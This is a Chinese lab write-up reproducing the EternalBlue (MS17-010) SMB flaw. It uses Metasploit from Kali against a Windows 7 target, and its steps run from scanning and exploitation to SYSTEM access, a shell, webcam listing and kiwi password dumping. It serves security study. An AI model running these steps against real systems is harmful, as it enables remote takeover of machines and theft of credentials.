MS17-010漏洞复现笔记
漏洞简介
永恒之蓝漏洞 CVE-2017-0143(MS17-010) 是方程式组织在其漏洞利用框架中一个针对SMB服务进行攻击的漏洞,该漏洞导致攻击者在目标系统上可以执行任意代码。
Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。
注:SMB服务的作用:该服务在Windows与UNIX系列OS之间搭起一座桥梁,让两者的资源可互通有无,SMB服务详解:点击查看
漏洞原理
下面两篇文章从实际代码详细分析了漏洞原理,想要从代码详细理解该漏洞的可以点击查看
http://blogs.360.cn/post/nsa-eternalblue-smb.html#toc-772
https://blog.csdn.net/qq_27446553/article/details/73480807
影响版本
目前已知受影响的Windows 版本包括但不限于:WindowsNT,Windows2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0。
复现过程
IP信息
1 | 攻击机:Kali Linux IP:192.168.216.138 |
靶机配置
1、开放靶机 Win7 445端口
使用netstat -an
看一下445端口是否活动
2.关闭win7防火墙(保险起见)
步骤:win7控制面板,然后在Windows防火墙中关闭即可
启动MSF
在kali里打开终端,输入下面的命令
1 | msfconsole |
查看漏洞模块
使用命令search ms17_010
搜索ms17_010模块
扫描主机
我们先使用扫描的模块对目标机进行扫描,如果目标机存在漏洞的话,我们再使用漏洞利用模块
1 | use auxiliary/scanner/smb/smb_ms17_010 //选择漏洞利用模块 |
扫描发现该靶机存在漏洞
利用漏洞
1 | use exploit/windows/smb/ms17_010_eternalblue //设置目标主机的地址 |
等待提示出WIN就已经成功拿到权限了
查看用户权限
使用命令getuid
查看当前用户的权限,发现已经是system权限了
查看系统信息
使用sysinfo
命令,可以查看到当前系统的信息
获取shell
拿shell,且是系统权限
1 | webcam_list # 查看有没有摄像头 |
获取密码
1 | load kiwi |